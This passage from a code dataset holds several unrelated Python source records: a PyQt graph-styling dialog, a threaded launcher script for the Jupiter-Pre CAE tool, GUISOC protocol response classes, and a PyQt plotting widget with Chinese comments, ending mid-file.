self.lineEditLabel.clear()\r\n self.lineEditLabel.setText(tekst)\r\n logging.debug('promjeni_izbor_stabla, kraj.')\r\n else:\r\n logging.debug('promjeni_izbor_stabla, kraj. Program mjerenja id je None. Izabrana je stanica.')\r\n\r\n def promjeni_label(self, tekst):\r\n \"\"\"\r\n promjeni/zamapti promjenu labela\r\n \"\"\"\r\n msg = 'Zahtjev za promjenom labela grafa. novi label={0}'.format(str(tekst))\r\n logging.debug(msg)\r\n self.defaultGraf[11] = str(tekst)\r\n\r\n def promjeni_marker_stil(self):\r\n \"\"\"\r\n promjeni/zapamti promjenu stila makrera\r\n \"\"\"\r\n marker = self.comboMarkerStil.currentText()\r\n msg = 'Zahtjev za promjenom stila markera. novi stil={0}'.format(str(marker))\r\n logging.debug(msg)\r\n self.defaultGraf[4] = marker\r\n\r\n def promjeni_line_stil(self):\r\n \"\"\"\r\n promjeni/zapamti promjenu stila linije\r\n \"\"\"\r\n line = self.comboLineStil.currentText()\r\n msg = 'Zahtjev za promjenom stila linije. novi stil={0}'.format(str(line))\r\n logging.debug(msg)\r\n self.defaultGraf[6] = line\r\n\r\n def promjeni_marker_size(self):\r\n \"\"\"\r\n promjeni/zapamti promjenu velicine markera\r\n \"\"\"\r\n velicina = self.spinMarker.value()\r\n msg = 'Zahtjev za promjenom velicine markera. novi size={0}'.format(str(velicina))\r\n logging.debug(msg)\r\n self.defaultGraf[5] = velicina\r\n\r\n def promjeni_line_width(self):\r\n \"\"\"\r\n promjeni/zapamti promjenu sirine linije\r\n \"\"\"\r\n sirina = self.doubleSpinLine.value()\r\n msg = 'Zahtjev za promjenom sirine linije. 
nova sirina={0}'.format(str(sirina))\r\n logging.debug(msg)\r\n self.defaultGraf[7] = sirina\r\n\r\n def promjeni_boju(self):\r\n \"\"\"\r\n promjeni/zapamti promjenu boje grafa\r\n \"\"\"\r\n logging.debug('Zahtjev za promjenom boje')\r\n # defaultni izbor\r\n rgb = self.defaultGraf[8]\r\n a = self.defaultGraf[9]\r\n #convert u QColor\r\n boja = pomocne_funkcije.default_color_to_qcolor(rgb, a)\r\n #poziv dijaloga za promjenu boje\r\n color, test = QtGui.QColorDialog.getRgba(boja.rgba(), self)\r\n if test: #test == True ako je boja ispravno definirana\r\n color = QtGui.QColor.fromRgba(color) #bitni adapter izlaza dijaloga\r\n rgb, a = pomocne_funkcije.qcolor_to_default_color(color)\r\n msg = 'nova boja rgb={0}, alpha={1}'.format(str(rgb), str(a))\r\n logging.debug(msg)\r\n #zapamti novu boju\r\n self.defaultGraf[8] = rgb\r\n self.defaultGraf[9] = a\r\n #set novu alpha vrijednost u odgovarajuci QDoubleSpinBox\r\n self.alphaBoja.setValue(a)\r\n #promjeni boju gumba\r\n logging.debug('update boje widgeta, prikaz izabrane postavke')\r\n self.set_widget_color_style(rgb,\r\n a,\r\n \"QPushButton\",\r\n self.bojaButton)\r\n else:\r\n logging.debug('izabrana boja nije validna.')\r\n\r\n def set_widget_color_style(self, rgb, a, tip, target):\r\n \"\"\"\r\n izrada stila widgeta\r\n tip - qwidget tip, npr \"QPushButton\"\r\n target - instanca widgeta kojem mjenjamo stil\r\n \"\"\"\r\n # get string name of target object\r\n name = str(target.objectName())\r\n #napravi stil\r\n stil = pomocne_funkcije.rgba_to_style_string(rgb, a, tip, name)\r\n #set stil u target\r\n target.setStyleSheet(stil)\r\n","sub_path":"view/dodavanje_pomocnih.py","file_name":"dodavanje_pomocnih.py","file_ext":"py","file_size_in_byte":13238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"605381657","text":"import os, subprocess\nimport threading\nimport time\nfrom jupiterutils import *\nimport logging\nimport psutil\n\nlogging.basicConfig(level=logging.DEBUG,\n format='(%(threadName)-9s) %(message)s',)\n\ndef CheckProcessDCAD(procName):\n for proc in psutil.process_iter():\n if proc.name() == procName:\n return True\n return False\n\ndef open_Jupiter(e, t):\n path = r\"C:\\Program Files\\TechnoStar\\Jupiter-Pre_5.0\\Start_It.bat\"\n # os.chdir(path)\n # os.system(\"Start_It.bat\")\n subprocess.run(path, shell=True)\n\n isDCADOpen = False\n while isDCADOpen == False:\n isDCADOpen = CheckProcessDCAD('DCAD_main.exe')\n logging.debug('Is Jupiter running now? %s', isDCADOpen)\n \n wait_time = 20\n logging.debug('Wait for %s seconds', wait_time)\n time.sleep(wait_time)\n logging.debug('$%s seconds passed', wait_time)\n e.set()\n logging.debug('Event set: %s', e.isSet())\n e.clear()\n\n while not e.isSet():\n event_is_set = e.wait(t)\n logging.debug('event set: %s', event_is_set)\n if event_is_set:\n logging.debug('Quitting Jupiter')\n JPT.QuitApplication()\n else:\n logging.debug('doing other things')\n \n\ndef create_Cube(e):\n e.wait()\n logging.debug('Using Jupiter')\n logging.debug('Create Cube')\n Geometry.Part.Cube()\n logging.debug('Fit Model')\n JPT.ViewFitToModel()\n JPT.ClearLog()\n e.set()\n \ne = threading.Event()\nt1 = threading.Thread(name='open_Jupiter', target=open_Jupiter, args=(e, 2)) \nt2 = threading.Thread(name='create_Cube', target=create_Cube, args=(e,)) \nt1.start()\nt2.start()\n\ni = 0\nwhile True:\n time.sleep(1)\n i += 1\n logging.debug('Hello! 
%s times', i)","sub_path":"src/python/testPSJ.py","file_name":"testPSJ.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"536729060","text":"\"\"\"\nModule authors:\nRomanov Andrey, xanter@granit.io\n\nThis file contains request messages factory and request message classes\n\"\"\"\n\nimport json\n\nfrom .Interface_Classes import IFactoryParser\nfrom .elements_guisoc import (BaseDictGUISOC, ImageFactoryGUISOC,\n FilterResourcesResponseGUISOC,\n FilterTenantsResponseGUISOC,\n TenantStatusFactoryGUISOC,\n VNFTenantFactoryGUISOC,\n VirtNodeFactoryGUISOC, StrFactoryGUISOC,\n TenantGUISOC)\nfrom libsoc_utils import StructHelper\n\nclass FactoryParserResponseGUISOC(IFactoryParser):\n msg_classes = {}\n\n\nclass ResponseGUISOC(BaseDictGUISOC, FactoryParserResponseGUISOC):\n type_name = \"response\"\n attributes = {\n \"status\": bool,\n \"error\": int,\n \"data_center\": str,\n \"id\": int\n }\n check_names = [\"id\", \"data_center\", \"status\"]\n\n def check(self):\n pass\n # TODO: make this check\n\n\nclass StatusResponseGUISOC(ResponseGUISOC):\n type_name = \"status\"\n attributes = {\n \"virtual\": FilterTenantsResponseGUISOC,\n \"physical\": FilterResourcesResponseGUISOC\n }\n attributes.update(ResponseGUISOC.attributes)\n\n def check(self):\n StructHelper.deep_check(StatusResponseGUISOC, self)\n # self.virtual.check()\n # self.physical.check()\n # StructHelper.check_str(self.filter, \"user_name\", False)\n # if not (self.filter in [\"all\", \"tenant\", \"node\"]):\n # pass\n\n\nclass ConsoleResponseGUISOC(ResponseGUISOC):\n type_name = \"console\"\n attributes = {\n \"content\": dict\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass RebootResponseGUISOC(ResponseGUISOC):\n type_name = \"reboot\"\n attributes = {\n \"content\": dict\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass DeployResponseGUISOC(ResponseGUISOC):\n type_name = \"deploy\"\n attributes = {\n \"name_id\": str ,# of tenant\n \"tenant\": TenantGUISOC# temporary\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass DeleteResponseGUISOC(ResponseGUISOC):\n type_name = \"delete\"\n attributes = {\n \"name_id\": str,# of tenant\n \"name\": str# temporary\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass ImageListResponseGUISOC(ResponseGUISOC):\n type_name = \"image_list\"\n attributes = {\n \"image_list\": ImageFactoryGUISOC\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass AddImagesResponseGUISOC(ImageListResponseGUISOC):\n type_name = \"add_images\"\n\n\nclass DelImagesResponseGUISOC(ImageListResponseGUISOC):\n type_name = \"del_images\"\n\n\nclass PartialDeployResponseGUISOC(ResponseGUISOC):\n type_name = \"partial_deploy\"\n attributes = {\n \"name_id\": str,# of tenant\n \"nodes\": VirtNodeFactoryGUISOC\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass PartialDeleteResponseGUISOC(ResponseGUISOC):\n type_name = \"partial_delete\"\n attributes = {\n \"name_id\": str,# of tenant\n \"nodes\": StrFactoryGUISOC\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass VmDeployResponseGUISOC(ResponseGUISOC):\n type_name = \"vm_deploying\"\n attributes = {\n \"name_id\": str,# of tenant\n \"nodes\": StrFactoryGUISOC\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass MigrateResponseGUISOC(ResponseGUISOC):\n type_name = \"migrate\"\n MIGRATE_STATE = [\"start\", \"process\", \"finish\", \"error\"]\n attributes = {\n \"direction\": str,\n \"name_id\": str,# 
of node\n \"nodes\": StrFactoryGUISOC,\n \"state\": str\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass VNFListResponseGUISOC(ResponseGUISOC):\n type_name = \"vnf_list\"\n attributes = {\n \"vnf_response\": dict\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass VNFSubscribeResponseGUISOC(ResponseGUISOC):\n type_name = \"vnf_subscribe\"\n attributes = {\n \"tenants\": VNFTenantFactoryGUISOC,\n \"vnf_response\": dict,\n \"tenant\": str,\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass VNFUnsubscribeResponsetGUISOC(ResponseGUISOC):\n type_name = \"vnf_unsubscribe\"\n attributes = {\n \"tenants\": VNFTenantFactoryGUISOC,\n \"vnf_response\": dict,\n \"tenant\": str,\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass VNFResultResponseGUISOC(ResponseGUISOC):\n type_name = \"vnf_result\"\n attributes = {\n \"tenants\": VNFTenantFactoryGUISOC,\n \"vnf_response\": dict,\n \"tenant\": str,\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass TenantsStatusResponseGUISOC(ResponseGUISOC):\n type_name = \"tenants_status\"\n attributes = {\n \"tenants\": TenantStatusFactoryGUISOC\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nFactoryParserResponseGUISOC.msg_classes.update({\n \"console\": ConsoleResponseGUISOC,\n \"status\": StatusResponseGUISOC,\n \"deploy\": DeployResponseGUISOC,\n \"delete\": DeleteResponseGUISOC,\n \"image_list\": ImageListResponseGUISOC,\n \"partial_deploy\": PartialDeployResponseGUISOC,\n \"partial_delete\": PartialDeleteResponseGUISOC,\n \"migrate\": MigrateResponseGUISOC,\n \"vnf_list\": VNFListResponseGUISOC,\n \"vnf_subscribe\": VNFSubscribeResponseGUISOC,\n \"vnf_unsubscribe\": VNFUnsubscribeResponsetGUISOC,\n \"vnf_result\": VNFResultResponseGUISOC,\n \"vm_deploying\": VmDeployResponseGUISOC,\n \"add_images\": AddImagesResponseGUISOC,\n \"del_images\": DelImagesResponseGUISOC,\n \"tenants_status\": TenantsStatusResponseGUISOC\n})\n","sub_path":"libsocapi/response_GUISOC.py","file_name":"response_GUISOC.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"199716409","text":"\n# coding=utf-8\n\n__author__ = 'Kevin_Liao'\n__all__ = ['PlotWidget']\n\nfrom PyQt4 import QtCore, QtGui, uic\nfrom PyQt4.QtGui import QButtonGroup\nfrom PyQt4.QtCore import Qt, pyqtSlot, pyqtSignal\nfrom driver.config import Number\nfrom ui.widgets.plotter.graphics import Graphics\n# from ui.widgets.filesetting import FileConfig\nfrom ui.objects.treeview import TreeView\nfrom ui.objects.button import Button\nfrom ui.widgets.ai import AttitudeIndicator\nfrom ui.objects.painter import Painter\nfrom driver.logger import Logger\nfrom lib import Library\n\nlogger = Logger(__name__)\nlib = Library()\n\nnumber = Number()\n\nclass PlotWidget(QtGui.QWidget):\n\n def __init__(self, parent, complex = False):\n super(PlotWidget, self).__init__()\n self.layout = lib.object.setMainLayout(self, [], spaces = [2, 2], margins = [3, 3, 3, 3])\n self.horizontalLayoutTop = QtGui.QHBoxLayout()\n self.horizontalLayoutCenter = QtGui.QHBoxLayout()\n self.gridLayoutBottom = QtGui.QHBoxLayout()\n \n # tttt = lib.object.setHBoxLayout([{0: \"00000\", 1: \"11116666666666666666666666666661\", 4: \"44444\"}, {0: \"000\", 2: \"22222\", 3: \"33333\"}])\n # bbbb = lib.object.setVBoxLayout([[\"aaaaa\", \"bbb\", \"cccc\"], [\"sffsf\", \"fsfsf\", \"bbb\"]], verify = True) \n # bbbb = lib.object.setVBoxLayout([\"aaaaa\", \"bbb\", \"cccc\"], verify = True)\n # bbb = 
lib.object.setHBoxLayout([[\"bbbb\", \"cccc\", \"dddd\"]], verify = True) \n lib.object.setLayout([self.horizontalLayoutTop, self.horizontalLayoutCenter, self.gridLayoutBottom], self.layout)\n self.parent = parent\n self.complex = complex\n self.reportcb = lib.caller() # Called when the status change\n self.report_file = 1\n self.report_close = 2\n self.report_delfile = 3\n self.report_loadfile = 4\n self.report_winsize = 5\n \n return\n \n self.initial()\n\n \n self.fileWrite = FileConfig(self.parent)\n self.setDir(lib.config.logpath(self.parent.moduleTitle))\n self.filePath = None\n \n \"\"\"\n aaa = u\"aaaaa\"\n aaa = QtCore.QString(aaa)\n logger.info(aaa)\n logger.info(type(aaa))\n aaa = str(aaa.toUtf8())\n aaa = aaa.decode('utf-8')\n logger.info(aaa)\n logger.info(type(aaa))\n \"\"\"\n # aaa = [\"bbb\"]\n # logger.info(aaa)\n # logger.info(aaa * 2)\n \"\"\"\n aaa = [\"bbb\"]\n aaa = {}\n aaa[\"1\"] = \"abc\"\n aaa[\"2\"] = \"cde\"\n aaa[\"8\"] = \"fdfdfdf\"\n\n \"\"\"\n # logger.info(aaa)\n # logger.info(aaa ** 3)\n \n self.overwrite = False\n self.setObject()\n\n # self.widgetControl.setHidden(complex)\n\n\n # logger.info(self.graphics.createCurveTable)\n # self.graphics.createCurveThread(\"curve1\")\n # self.graphics.startCurveThread()\n if self.complex:\n self.graphics.setTitleSize(2)\n \n self.showStatus(\"IDLE\")\n\n def initial(self):\n self.logpath = None # 載入檔案路徑\n self.loadfile = None # 載入檔案\n self.exportfile = lib.filepacket() # 建立 export 檔案\n self.bulkdata = {} # bulk data\n \n def setIdle(self, idle):\n self.graphics.setIdle(idle)\n if idle:\n logger.info(\"out: %s\" % str(self))\n else:\n logger.info(\"in: %s\" % str(self))\n \n def addGraphics(self, curveName, lineName, initial = 0):\n lib.object.delLayout(self.plotObject.itemLayout) # 刪除舊 item\n if self.graphics.addGraphics(curveName, lineName, initial):\n self.plotObject.setItemLayout() # 新增 item\n self.random.initsample(1, 100, 0.001, len(lineName))\n\n def addPoint(self, data, times = None): # 增加資料\n dataStatus = self.graphics.addPoint(data, times)\n if dataStatus != None:\n timelist = lib.config.transTime(self.graphics.getLogTime())\n self.plotObject.timeLabel.setText(\"%02d:%02d:%02d\" % (timelist[\"hour\"], timelist[\"min\"], timelist[\"sec\"]))\n self.plotObject.sampleLabel.setText(str(self.graphics.getLogLength()))\n self.plotObject.intervalLabel.setText(str(self.graphics.getLogInterval()))\n \n \n self.plotObject.video.updateImage()\n # if self.graphics.getLogLength() % 2 == 1: self.plotObject.updateButton(self.plotObject.btnImageDataIn, \"blink/flickr1.png\")\n # else: self.plotObject.updateButton(self.plotObject.btnImageDataIn, \"blink/flickr.png\")\n # self.writeLogFile(dataStatus) # 寫入資料\n return dataStatus\n\n def addSignal(self, level, data):\n # dataStatus = self.graphics.addPoint(data)\n \n for index in data:\n data = level * 2 + data\n logger.info(\"L: %d, D: %d\" % (level, data))\n # self.signal = 0\n\n def showStatus(self, text = \"IDLE\", busy = False):\n if busy: color = [198, 0, 0]\n else: color = [0, 138, 69]\n lib.object.setColor(self.plotObject.status, text = \"%s\" % text, fontcolor = \"#FFFFFF\", bgcolor = color)\n\n def setBulkData(self, bulkdata):\n if len(bulkdata):\n self.bulkdata = bulkdata\n # self.plotObject.xManualRange.setChecked(True)\n # self.plotObject.xModeChange(self.plotObject.xManualRange)\n size = self.graphics.setBulkData(bulkdata)\n self.plotObject.sampleLabel.setText(str(size))\n self.plotObject.intervalLabel.setText(str(self.graphics.getLogInterval()))\n timelist = 
lib.config.transTime(self.graphics.getLogTime())\n self.plotObject.timeLabel.setText(\"%02d:%02d:%02d\" % (timelist[\"hour\"], timelist[\"min\"], timelist[\"sec\"]))\n # 建立亂數 baseline\n baselinelist = []\n lastdata = self.graphics.getLastPoint()\n for itemlist in self.graphics.getItem(): # 讀取 item list\n baselinelist.append(lastdata[itemlist][0])\n self.random.updatesample(baselinelist)\n self.showStatus()\n\n def setLogPath(self, path):\n self.logpath = str(path)\n\n def setLoadFile(self, file):\n self.loadfile = file\n self.loadfile.setCallback(self.setBulkData)\n \n\n \n def readConfig(self):\n pass\n\n def setObject(self):\n \n self.random = lib.random()\n self.timerThread = lib.timer(self, 0.1, self.timeServer)\n self.writefileThread = lib.queue(self, 0.5, self.writelog, 5)\n self.graphics = Graphics()\n self.plotObject = PlotObject(self)\n\n def addTag(self):\n self.graphics.addTag(\"test\")\n # self.sendButton = QtGui.QPushButton(self)\n # self.sendButton.setText(\"11\")\n \n def setTimeServer(self):\n if self.plotObject.randomSample.checkState() == Qt.Checked: self.timerThread.start()\n else: self.timerThread.stop()\n\n def timeServer(self):\n # logger.info(lib.config.timer())\n lineName = {}\n itemlist = self.graphics.getItem() # 讀取 item list\n # self.lineName[item] = self.random.getsample()\n sample = self.random.getsample(-50, 50, 0.001)\n # logger.info(sample)\n \n # self.random.cpu()\n # sample = [self.random.memory(), self.random.net(1), self.random.net(2), self.random.net(3)]\n # sample = self.random.data[\"cpu\"]\n for index in range(len(itemlist)):\n item = itemlist[index]\n # logger.info(item)\n lineName[item] = sample[index]\n self.addPoint(lineName)\n return\n rate = 0.1\n self.index = self.index + 1\n # return\n itemlist = self.graphics.getItem() # 讀取 item list\n \"\"\"\n for item in itemlist:\n # value = rand.random.random() + lib.config.np.sin(self.index * 0.1) / (self.index * 0.1) # / (self.randSampleRate) #rand.random.random()\n value = number.np.sin(self.index * 0.1)\n if item in self.lineName:\n self.lineName[item] = self.lineName[item] * (1 - rate) + value * rate\n else:\n self.lineName[item] = value\n \"\"\"\n data = number.random.random()\n for index in range(len(itemlist)):\n item = itemlist[index]\n # value = 0\n if index == 0:\n value = number.np.sin(self.index * 0.1)\n elif index == 1:\n value = number.np.cos(self.index * 0.1)\n elif index == 2:\n # value = number.np.tan(self.index * 0.1) / 100\n pass\n elif index == 3:\n value = number.np.sin(number.np.exp(self.index * 0.01)) # / number.np.log(self.index * 0.1)\n elif index == 4:\n value = number.np.sin(self.index * 0.01) / number.np.tanh(self.index * 0.1)\n elif index == 5:\n value = number.np.tanh(self.index * 0.1) / 100\n else:\n value = number.random.random()\n value = number.random.random() + index\n value = data + index * 0.1\n # value = min(2, value)\n # value = max(-2, value)\n \n \"\"\" \n if item in self.lineName:\n self.lineName[item] = self.lineName[item] * (1 - rate) + value * rate\n else:\n self.lineName[item] = value\n \"\"\"\n self.lineName[item] = lib.random().samples()\n \n \n # logger.info(lib.random())\n self.parent.addPoint(self.lineName)\n \n \n\n \n # self.graphics.getBulkData()\n\n\n\n def addCurve(self, title):\n self.graphics.addCurve(title)\n\n def clearData(self, force = False):\n if force: reply = lib.message.BtnYes # 清除資料\n else: reply = lib.object.question(self, \"開新圖形\", u\"你想要開新的圖形資料嗎\", lib.message.BtnYes, lib.message.BtnNo)\n if reply == lib.message.BtnYes: 
self.graphics.clearData()\n\n def deleteFile(self, force = False):\n reply = lib.object.question(self, \"刪除檔案\", u\"你想要刪除圖形資料 [%s] 嗎\" % self.graphics.getCurveName(), lib.message.BtnYes, lib.message.BtnNo)\n if reply == lib.message.BtnYes: self.reportcb.call(self, self.report_delfile, \"\")\n\n def setDir(self, dir):\n dir = str(dir)\n if dir != \"\": self.dirpath = dir\n\n def reloadfile(self): # 重新載入曲線檔\n if lib.config.isfile(self.logpath):\n reply = lib.object.question(self, \"重新載入圖檔\", u\"你想要重新載入 [%s] 圖形資料嗎\" % self.graphics.getCurveName(), lib.message.BtnYes, lib.message.BtnNo)\n self.reportcb.call(self, self.report_loadfile, self.logpath)\n\n def openFileDir(self):\n if self.logpath != None: lib.object.openUrl(self.logpath)\n\n\n def exportRangeFile1(self):\n # logger.info(\"exportRangeFile\")\n bulkdata = self.graphics.getBulkData()\n bulkdata[\"parame\"] = {\"1\": 567, \"2\": 456, \"3\": 789, \"4\": 555}\n self.exportfile.write(bulkdata)\n \n def getFilename(self, filename = \"\"):\n if filename == \"\":\n curvename = self.graphics.getCurveName()\n filename = curvename.split(\".\")[0]\n dirpath = lib.config.getdir(self.logpath)\n if lib.config.isdir(dirpath): filepath = dirpath + filename + \".txt\" # 舊目錄 \n else: filepath = self.dirpath + filename + \"/\" + filename + \".txt\" # 新目錄\n return filepath\n \n def exportFile(self):\n # fileName = \"aaaa\"\n # logger.info(self.getFilename(\"tsttstt\"))\n # filePath = self.dirpath + fileName + \"/\" + fileName + \".csv\"\n # logger.info(filePath)\n if self.graphics.getLogLength():\n rangeIndex = self.graphics.getRegionIndex()\n if self.plotObject.timeModeBox.currentIndex():\n data = self.graphics.getItemSample()\n datarange = [int(data[rangeIndex[0]]), int(data[rangeIndex[1]])]\n else:\n data = self.graphics.getItemTime()\n datarange = [lib.format.float(data[rangeIndex[0]]), lib.format.float(data[rangeIndex[1]])]\n reply = lib.object.question(self, \"區域圖形資料輸出\", \"你想要輸出 [%s-%s] 區域資料嗎\" % (str(datarange[0]), str(datarange[1])), lib.message.BtnYes, lib.message.BtnNo)\n # reply = lib.message.BtnYes\n if reply == lib.message.BtnYes:\n bulkdata = self.graphics.getBulkData()\n filepath = self.getFilename()\n # logger.info(\"time: %f, %f\" % (times[rangeIndex[0]], times[rangeIndex[1]]))\n # filepath = self.dirpath + fileName + \"/\" + fileName + \".txt\" \n bulkdata[\"parame\"] = {\"1\": 123, \"2\": 456, \"3\": 789}\n self.exportfile.open(filepath, \"w\", rename = True, timeformat = False, callback = self.closeexportFile)\n self.exportfile.write(bulkdata, start = rangeIndex[0], stop = rangeIndex[1])\n # if lib.config.isfile(self.filePath): self.reportcb.call(self, self.report_file, self.filePath)\n\n def closeexportFile(self, filepath):\n logger.info(\"end export\")\n logger.info(filepath)\n self.reportcb.call(self, self.report_file, filepath)\n\n def createLogFile1(self):\n bulkdata = self.graphics.getBulkData()\n fileName = str(self.graphics.getCurveName())\n logger.info(fileName)\n return\n\n \n fileStatus = self.fileWrite.isOpen()\n if not fileStatus: # 尚未建立\n fileName = str(self.graphics.getCurveName())\n if lib.config.find(fileName, \".csv\") != -1:\n fileName = fileName.replace(\".csv\", \"\")\n addr = lib.config.rfind(fileName, \"-\")\n if addr != -1: fileName = lib.config.midLength(fileName, 0, addr)\n if fileName != \"\":\n filePath = self.dirpath + fileName + \"/\" + fileName + \".csv\"\n \n self.file = lib.filepacket(filePath, \"w\") # 建立 Log data\n \n itemlist = self.graphics.getItem()\n header = [\"times\"] + itemlist\n # 
self.file.write(header)\n bulkdata = self.graphics.getBulkData()\n logger.info(bulkdata)\n return\n \n \n fileStatus = self.fileWrite.createNewFile(filePath, rename = True, timeformat = True) # 檔名使用流水編號\n self.filePath = self.fileWrite.readFileName()\n itemlist = self.graphics.getItem()\n if len(itemlist):\n header = [\"times\"]\n header = header + itemlist\n \n logger.info(header)\n \n self.fileWrite.writeFile(header, \",\")\n # 加入已存在的 data\n logger.info(lib.config.timer())\n bulkdata = self.graphics.getBulkData()\n dataline = []\n datalist = {}\n itemlist = self.graphics.getItem()\n \n for item in itemlist: # 依照原始 item 順序讀取資料\n datalist[item] = bulkdata[item][0]\n timelist = bulkdata[item][1]\n timenum = len(timelist)\n \n logger.info(lib.config.timer())\n for index in range(timenum):\n dataline = []\n dataline.append(timelist[index])\n for item in itemlist:\n value = datalist[item][index]\n # logger.info(type(value))\n # logger.info(value)\n # if type(value) == float: value = lib.format.float(value, 4)\n dataline.append(str(value))\n self.fileWrite.writeFile(dataline, \",\")\n logger.info(lib.config.timer())\n \n \n \n # self.writefileThread\n return fileStatus\n\n \"\"\"\n def createLogFile(self):\n fileStatus = self.fileWrite.isOpen()\n if not fileStatus: # 尚未建立\n fileName = str(self.graphics.getCurveName())\n if lib.config.find(fileName, \".csv\") != -1:\n fileName = fileName.replace(\".csv\", \"\")\n addr = lib.config.rfind(fileName, \"-\")\n if addr != -1: fileName = lib.config.midLength(fileName, 0, addr)\n if fileName != \"\":\n filePath = self.dirpath + fileName + \"/\" + fileName + \".csv\"\n fileStatus = self.fileWrite.createNewFile(filePath, rename = True, timeformat = True) # 檔名使用流水編號\n self.filePath = self.fileWrite.readFileName()\n itemlist = self.graphics.getItem()\n if len(itemlist):\n header = [\"times\"]\n header = header + itemlist\n self.fileWrite.writeFile(header, \",\")\n # 加入已存在的 data\n logger.info(lib.config.timer())\n bulkdata = self.graphics.getBulkData()\n dataline = []\n datalist = {}\n itemlist = self.graphics.getItem()\n \n for item in itemlist: # 依照原始 item 順序讀取資料\n datalist[item] = bulkdata[item][0]\n timelist = bulkdata[item][1]\n timenum = len(timelist)\n \n logger.info(lib.config.timer())\n for index in range(timenum):\n dataline = []\n dataline.append(timelist[index])\n for item in itemlist:\n value = datalist[item][index]\n # logger.info(type(value))\n # logger.info(value)\n # if type(value) == float: value = lib.format.float(value, 4)\n dataline.append(str(value))\n self.fileWrite.writeFile(dataline, \",\")\n logger.info(lib.config.timer())\n \n \n \n # self.writefileThread\n return fileStatus\n \"\"\"\n \n \n \n def writeLogFile(self, datalist): # 寫入 Log 資訊\n if self.plotObject.saveRawdata.checkState() == Qt.Checked:\n data = datalist[0]\n times = str(datalist[1])\n if self.createLogFile1():\n dataline = [times]\n itemlist = self.graphics.getItem()\n for item in itemlist:\n value = data[item]\n if type(value) == float: value = lib.format.float(value, 4)\n dataline.append(str(value))\n self.fileWrite.writeFile(dataline, \",\")\n\n def closeFile(self):\n self.fileWrite.closeFile()\n if lib.config.isfile(self.filePath): self.reportcb.call(self, self.report_file, self.filePath)\n self.filePath = None\n \n def writelog(self, index):\n logger.info(\"%d: \" % index)\n bulkdata = self.graphics.getBulkData()\n dataline = []\n datalist = {}\n itemlist = self.graphics.getItem()\n for item in itemlist: # 依照原始 item 順序讀取資料\n datalist[item] = bulkdata[item][0]\n 
timelist = bulkdata[item][1]\n\n def saveConfig(self):\n self.closeFile()\n \n def closeGraphics(self):\n reply = lib.object.question(self, \"關閉圖形\", \"你想要關閉 [%s] 圖形嗎\" % str(self.graphics.getCurveName()), lib.message.BtnYes, lib.message.BtnNo)\n if reply == lib.message.BtnYes: self.reportcb.call(self, self.report_close, \"\")\n \n def closeEvent(self, event):\n if self.loadfile != None: self.loadfile.close()\n self.timerThread.stop()\n self.graphics.close()\n self.saveConfig()\n\n\n \n \n \n\nclass PlotObject:\n \n def __init__(self, parent):\n self.parent = parent\n self.graphics = self.parent.graphics\n \n\n self.setObject()\n\n self.setCenterLayout()\n self.setBottomLayout()\n self.setTopLayout()\n\n def setObject(self):\n self.reportLock = False\n self.menuWidth = 140 # 150\n self.bgcolor = [225, 255, 255] # 標題背景\n \n \n self.graphics.reportcb.addCallback(self.updateStatus) # 嘗試加入 module sendlinkcb\n\n\n \n \n \n \n \n\n \n self.randomSample = QtGui.QCheckBox(\"Random\")\n self.randomSample.stateChanged.connect(self.parent.setTimeServer)\n\n \n self.parent.horizontalLayoutTop.setSpacing(2)\n\n \n\n \n\n\n \n self.layoutPlotControl = QtGui.QGridLayout()\n self.parent.gridLayoutBottom.addLayout(self.layoutPlotControl)\n \n # self.setPlotControlList()\n \n def updateStatus(self, index, data): # 回報狀態\n self.reportLock = True\n if index == self.graphics.reportRangeSize:\n self.xSizeRange.setValue(data)\n elif index == self.graphics.report_range_slider:\n [range_min, range_value, range_max] = data\n [min, max] = [self.xRangeSlider.minimum(), self.xRangeSlider.maximum()]\n sliderIndex = lib.config.intermediate(range_min, range_value, range_max, min, max) # 計算位移的起始點,並換算捲軸移動位置\n self.xRangeSlider.setValue(sliderIndex)\n elif index == self.graphics.report_range_manual:\n self.xManualRange.setChecked(data)\n \n \n\n if data == False: self.symbol.setCurrentIndex(0)\n \n elif index == self.graphics.report_range_info:\n [xRange, yRange] = data\n self.xMinRange.setValue(xRange[0])\n self.xMaxRange.setValue(xRange[1])\n self.yMinRange.setValue(yRange[0])\n self.yMaxRange.setValue(yRange[1])\n if self.yViewRange.currentIndex() == 2: # Fixed range\n y = [self.yMinRange.value(), self.yMaxRange.value()]\n self.graphics.setDrawAllGraphics(y = y)\n self.reportLock = False\n\n # ========================================================================\n # 物件設定區\n # ========================================================================\n\n def setTopLayout(self):\n # self.progress = lib.button(\"loading\", key = \"load*.png\")\n \n # self.status = self.setTitleLabel(\"IDLE\", 40, 16)\n self.status = lib.object.setSize(QtGui.QLabel(), 50, 16)\n lib.object.setAlignment(self.status, Qt.AlignHCenter | Qt.AlignVCenter)\n \"\"\"\n # lib.object.setColor(self.status, text = \"IDLE\", fontcolor = \"#FFFFFF\", bgcolor = [81, 190, 40])\n def funPlay(mode):\n if mode == \"play\":\n self.play.hide()\n self.pause.show()\n self.graphics.setDataEnable(True)\n else:\n self.play.show()\n self.pause.hide()\n self.graphics.setDataEnable(False)\n \n self.play = lib.object.setTooltip(lib.button(path = \"plot/play1.png\", callback = funPlay, parame = \"play\"), \"啟動資料紀錄\")\n self.pause = lib.object.setTooltip(lib.button(path = \"plot/pause1.png\", callback = funPlay, parame = \"pause\"), 